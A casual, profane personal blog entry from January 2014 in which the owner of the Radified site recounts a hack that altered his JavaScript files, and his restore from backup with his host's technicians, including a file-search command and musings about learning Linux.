Site Hacked!

� The site was hacked yesterday (Jan 15, 2014). Somebody (or bodies) somehow got the main site password and had full access. They were downloading and uploading files like they owned the thing. Like they were up in their own house .. sittin' on their own couch. "Somebody's been sleeping in *my* bed," said papa bear.

Neo dons Matrix glasses in order to see betterThis has never happened before (.. far as I know, anyway).

I had to restore a back-up from the 14th .. which was taken before any nasties occurred ..

.. but you probably need to close all radified web pages and clear your browser cache.

I posted more info in the forums .. see � here.

If you made any posts between the 14th and today, they are gone (2 days worth).

From what I can see .. they modified some of my javascript files in order to WRITE to a file on a server located down near the border of San Diego with Mexico (Chula Vista).

My trace-route program is not exact, so I can't tell if the server is physically located in Mexico .. but it looks like it's located in the US.

Hacking is a Full-Time Job (apparently)

Somebody near NYC spent most of the day yesterday playing with/on my server .. from ~6AM East coast time, to 3PM East coast time. (Dude, you spent all freaking day on my server? WTF? Certainly you have better shit to do, no?)

So .. the script hack seems more snoopy than malicious. The techs at Wiredtree helped me. They are wizards. Stuff I never woulda thought of.

Hacker FingerprintYes I noticed the site acting strangely yesterday, but I did not have time to troubleshoot.

Then this morning, the server down in Chula Vista (probably hacked itself) became overloaded and that raised the red flag ..

.. very high. (waiting for �

I played around and noticed that the problem did not occur when I disabled javascript or went thru a proxy server (which had disabled javascript by default).

Dude, if you want site stats, why don't you just ask? All the data contained on this site is open and free for all to access.

Where should I send the file? Then I wont be overloading your server. What kind of stats would you like?

I dont want to put you out of a job .. but your code is fucking up my site.

<ignore this body-text marker>

��� today's entry continues here below ���

I dont sell anything here. There are no credit card numbers coming in. So it seems your time would be better spent elsewhere.

Regarding the snooping hacker .. I pretend that there is a set of eyes looking over my shoulder, watching me type. (Because there is.) And when I pass gas, I say, "That's for you, bitch. You're welcome."

Step-by-Step Troubleshooting = An Algorithm

To be honest, it really does feel like an "attack". Kinda slimy. Like somebody's been sleepin in *my* bed. Ick. Now there are bugs crawling in my bed. Maybe I am not as tired as I thought I was.

Yes, getting hacked feels surprisingly icky .. but � Geeks love that kind of shit. I had a woody the whole time. Let me share with you the process we (I) went thru .. cuz this is the kind of shit geeks love most.

The worst part was that I saw the problem while I was still half asleep. And I was whacked when I woke cuz I had run the hill the day that I heard about the Kelly-verdict. (See below.) Probably ran harder than I should've.

Anyway, I knew there was a problem with either my browser (local) or the server (Chicago).

Local browser was easiest, so I uninstalled and re-installed Chrome. "Oh, that's not good," I said, when the problem persisted after re-install.

Hacking ChainedSo I called my server techs. (Who are there 24x7.) They are true wizards. Really. The girl starts by virus-scanning the whole site server, which found nothing suspicious.

So I shoot them an email saying � "How do I search every file on the site for the string � vacance-petit-prix?" I would rather do it myself .. if I can. (Cuz that's how we learn.) And the dude gives me the code. Here it is. Take a deep breath:

find /home/radified/public_html/ -type f -exec 'grep' '-Hin' '' '{}' ';' 2>/dev/null

But, in order to use this, you must go into � the shell. Which uses the � command line. An unforgiving place. But you can feel the power there.

And the program that I use to access the shell (PuTTY) does NOT support copy-n-paste .. not in Windows.

Because it is a fundamentally different operating system .. seeing the server runs on Linux (Unix-y) .. and there is a fundamental mistrust at the very cores of each .. of the other "I dont know you, jack. Where you from?" ..

While, in Linux you CAN copy-n-paste into the shell command lines. Which is why anybody who has anything to do with servers that run Linux want to be USING (and proficient with) � Linux.

Proficiency with Linux & Server Administration

I have heard that � this is a good book on the subject .. of proficiency with and in a Linux/Server environment.

Look at the title of this one � Linux System Programming: Talking Directly to the Kernel and C Library. This is well beyond me .. but my sense is that the person who knows (understands) how to wield the mojo contained in that title .. would be a bad dude.

Linux Book by Mark Sobell (2012) 3rd editionI am suddenly feeling a jones for learning the Linux operating system .. along with server admin (.. two things which actually line up nicely together .. one after the other).

There is a nice clean feeling in Linux that is hard to describe .. because it actually feels like part of your imagination.

For the geek, you kinda wanna learn stuff that is going to provide the most access to power. And servers are very powerful. Because they � transmit infomation (� ideas, skills, tools, techniques, jokes, laughs, sorrows, outrage, etc.). From one like-minded soul to another.

It feels like I am talking myself into becomin more proficient with server administration (via the � command line). Dude, there are soo many books at Amazon with Linux-orientated titles dated 2012. Very recent.

Wish I could download the skill sets contained in those books .. like they do in the Matrix. "Standby for data upload. Hey, now I know how to fly a helicopter. Cool."

Anyway, in Windows, where I am right now, you must type each individually. Did you see the size of that freaking string? Wrap city. Here, let me show you again:

find /home/radified/public_html/ -type f -exec 'grep' '-Hin' '' '{}' ';' 2>/dev/null

Let me just note here .. and say that, wizardly programmers have told me that, in order to become a studly programmer, I needed to learn (how to use) � regular expressions.

No I have not learned them. But yes, I can see how powerful they are. Easily see. Amazingly powerful.

The SKILL required to assemble and operate those commands is kinda what I was talking about back when I discussed the different mindsets involved using Windows vs Unix (Linux).

Monolithic vs Granularity. Too much to delve into right now, but maybe this will remind me to re-explore later.

PuTTY comes with WinSCP, which supports secure file transfers. And no, I was not using the latest greatest version. But I *did* upgrade today.

Hacking Patient RecordsAnyway, we got lots of "hits" from that query .. fucking gold mine .. all of them located in javascript files.

I knew that, the day before, I had only modified the files in Moveable Type, which runs off a database (MySQL).

So, I say, "Dude, let's back-up the MySQL database, and then restore a site back-up from before the time when the hack occurred ..

.. and then restore the database .. because that is really the only thing that I changed between then and now."

This guy who I was talking to .. I could tell that he was a few lightyears ahead of me. It's so satisfying when you work with people who � know what the fuck they are doing. (Competence.)

He sent me a note that said something like � "Dude, I'm handling it. I'll let you when it's done."

Less than an hour later he said � "It's done. Lemme know how things look."

I nearly shit myself when the problem was STILL THERE .. but then I remembered to clear my browser cache. (Like I once told somebody's lawyer who was threatening me with untold nastiness.) Anyway .. after I cleared the browser cache � success! Voila! Freaking magic.

Update. This new WinSCP is � sweet. Very smoooth. Nice feel. Very professional feel. Like very smart people assembled it. I would certainly be proud. I mean, it is like � get-your-attention nice.

Hopefully it has no NSA backdoors .. like other technology has.

Radified home

<ignore this bottom text spacer>

About this Entry

This page contains a single entry by Rad published on January 16, 2014 1:16 AM.

The Kelly Thomas Verdict Reflects the Importance of Appearances in Polite Society was the previous entry in this blog.

Thanks for the Memories, George (Ode to 43) is the next entry in this blog.

Find recent content on the main index or look in the archives to find all content.